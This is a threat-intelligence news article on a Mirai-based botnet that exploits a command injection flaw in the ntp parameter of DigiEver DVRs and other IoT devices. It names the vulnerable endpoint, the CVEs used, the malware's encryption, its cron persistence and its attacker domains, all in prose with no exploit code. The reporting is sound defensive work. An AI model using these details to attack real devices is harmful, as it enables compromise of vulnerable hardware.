Vulnerable DigiEver DS-2105 Pro DVRs are being targeted by a modified Mirai variant, where this malware, leveraging improved encryption, is spreading rapidly, exploiting a security flaw discovered by Ta-Lun Yen.
Recent Mirai-based malware campaigns dating back to October 2024 have targeted the URI /cgi-bin/cgi_main.cgi, which is being exploited to compromise vulnerable systems.
A new botnet, “Hail Cock Botnet,” has been exploiting a remote code execution vulnerability in DigiEver DS-2105 Pro DVRs and TP-Link devices, leveraging a Mirai variant to compromise vulnerable IoT devices.
The researcher identified vulnerable DigiEver DVRs exposed online. By analyzing the `/cgi-bin/cgi_main.cgi` endpoint, they successfully exploited a vulnerability leading to remote code execution on these devices.
A new attack targeted DigiEver devices on Nov 18th, where attackers exploited a command injection bug in the ntp parameter to download Mirai malware from a remote server via HTTP post requests.
It exploits multiple vulnerabilities, including CVE-2023-1389 (TP-Link) and CVE-2018-17532 (Teltonika), to inject malicious commands via web requests, where downloaded scripts then fetch and execute Mirai malware.
The Mirai-based malware, encrypted with XOR and ChaCha20, was found to decrypt and display hidden strings, including “you are now apart of hail cock botnet,” from its data segment during runtime, which were not visible in static analysis or XOR-decoded strings.
The function FUN_00404960 decrypts encrypted strings using an XOR operation. The decrypted string, identified as a cryptographic constant “expand 32-byte k,” suggests the use of algorithms like Salsa20 or ChaCha20 for encryption.
They are evolving their tactics to include more complex decryption methods while still relying on common default credentials for spreading, which is evident from the addition of new credential pairs like “telecomadmin” for Huawei devices and Realtek routers.
Malware analysis in a sandbox reveals a cron job creation for persistence, which downloads a shell script named “wget.sh” from “hailcocks.ru” using either wget or curl for redundancy.
The malware exhibits Mirai-like brute-forcing behavior, connecting to numerous hosts, and also communicates with a C2 server at “kingstonwikkerink[.]dyn.”
Older versions display a distinctive message “you are now apart of hail cock botnet,” while newer ones show “I just wanna look after my cats, man.” on compromised systems.
According to Akamai researchers, cybercriminals exploit outdated firmware and retired hardware like the DigiEver DS-2105 Pro to build botnets like Hail Cock.
Manufacturers often neglect security updates for older devices, making them easy targets. To mitigate risks, users should upgrade vulnerable devices to newer models.